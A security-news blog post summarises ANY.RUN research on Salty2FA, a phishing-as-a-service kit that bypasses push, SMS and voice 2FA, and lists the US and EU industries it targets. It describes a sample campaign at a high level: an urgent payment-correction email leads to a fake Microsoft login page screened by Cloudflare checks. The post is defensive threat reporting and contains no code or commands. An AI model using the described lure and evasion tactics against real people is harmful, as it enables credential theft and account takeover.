Beware of Salty2FA: A New Phishing Kit Aiming at US and EU Businesses

ByAdmin

Phishing-as-a-Service (PhaaS) platforms continue to evolve, providing attackers with faster and cheaper methods to infiltrate corporate accounts. Researchers at ANY.RUN have identified a new threat: Salty2FA, a phishing kit engineered to circumvent various two-factor authentication (2FA) methods and evade traditional security measures. This kit has already been detected in campaigns across the United States and Europe, posing significant risks to enterprises in sectors ranging from finance to energy. Salty2FA’s multi-stage execution chain, evasive infrastructure, and capability to intercept credentials and 2FA codes render it one of the most perilous PhaaS frameworks observed this year.

Salty2FA raises the stakes for enterprises by effectively bypassing push, SMS, and voice-based 2FA, allowing stolen credentials to lead directly to account takeovers. The kit has targeted industries such as finance, energy, and telecommunications, transforming common phishing emails into high-impact breaches. ANY.RUN analysts have mapped Salty2FA campaigns, revealing activity across multiple regions and industries, with US and EU enterprises being the most heavily affected. Key targeted industries in the United States include finance, healthcare, government, logistics, energy, IT consulting, education, and construction, while in Europe, the focus is on telecom, chemicals, energy (including solar), industrial manufacturing, real estate, and consulting.

Salty2FA began gaining traction in June 2025, with early signs possibly dating back to March or April. Confirmed campaigns have been active since late July and continue to generate numerous fresh analysis sessions daily. A recent case analysed by ANY.RUN illustrates how convincingly Salty2FA can operate. An employee received an email titled “External Review Request: 2025 Payment Correction,” designed to create a sense of urgency and bypass scepticism. Upon opening the email in the ANY.RUN sandbox, the attack chain was revealed step by step. The email contained a payment correction request disguised as a routine business message. The link led to a Microsoft-branded login page, which was wrapped in Cloudflare checks to evade automated filters. ANY.RUN’s Automated Interactivity handled the verification process automatically, exposing the flow without requiring manual clicks and significantly reducing investigation time for analysts. Finally, the employee’s details entered on the page were harvested and exfiltrated. 

Categories: Phishing Techniques, Targeted Industries, Two-Factor Authentication Bypass 

Tags: Phishing-as-a-Service, Salty2FA, Two-Factor Authentication, Credential Theft, Account Takeover, Evasive Infrastructure, Phishing Campaigns, Targeted Industries, Cybersecurity, Email Lure 

Leave a Reply

Your email address will not be published. Required fields are marked *